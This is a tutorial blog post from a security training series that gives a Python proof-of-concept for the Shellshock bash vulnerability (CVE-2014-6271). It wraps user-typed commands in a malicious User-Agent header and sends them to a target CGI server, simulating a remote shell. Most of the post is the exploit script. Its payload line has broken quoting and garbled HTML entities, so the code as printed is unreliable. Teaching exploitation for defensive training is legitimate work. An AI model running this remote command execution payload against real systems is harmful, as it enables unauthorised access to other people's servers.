Python for InfoSec Professionals Use Case 1: CVE-2014-6271

save
Share and earn Cybytes
Facebook Twitter LinkedIn Email

Shell Shock

This Python snippet is a very cool PoC because it drops the user into what feels like a command shell on the target. The intention is to make the user feel like they have a shell on the system. It will basically loop through sending requests to the server with a modified User-Agent sending the attack string.

The commented code below wraps an HTTP request with an endless loop grabbing input from the user to pass as the payload. You can see how to make an HTTP request and modify the User-Agent using Python:

#!/usr/bin/python
import sys, urllib2    # Import the required modules for the vulnerability
 
if len(sys.argv) != 2:    # Checks to be sure that a URL was supplied as a sys argument "&ltscript&gt &ltURL&gt"
  print "Usage: "+sys.argv[0]+" &ltURL&gt"
  sys.exit(0)
 
URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting Shell_Shock - Make sure to type full path"
 
while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  command=raw_input("~$ ")
  opener=urllib2.build_opener()        # Modifying the default request to include the attack string via User-Agent
  opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ' /bin/bash -c "'+command+'"')]
  try:                    # Sets up a Try/Except loop so exceptions are handled cleanly
    response=opener.open(URL)    # Sends request and prints the response
    for line in response.readlines():
      print line.strip()
  except Exception as e: print e

Below we demonstrate this script in action interacting with a vulnerable test system. You can see how it looks like a command shell in the top window, but it is actually just sending HTTP GET requests to the vulnerable system in the bottom window:

shell_1

Continue to Python for InfoSec Professionals Use Case 2: CVE-2012-1823►


Interested in learning more about Python for Security Professionals?
Start Cybrary’s FREE Python for Security Professionals Course Today!

pythoncourse

Share this post and earn Cybytes
Facebook Twitter LinkedIn Email
Follow
2191 Followers
About Primal Security
Primal Security is a blog and podcast dedicated to sharing knowledge within the information security community. Learn more about the Primal Security Team.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel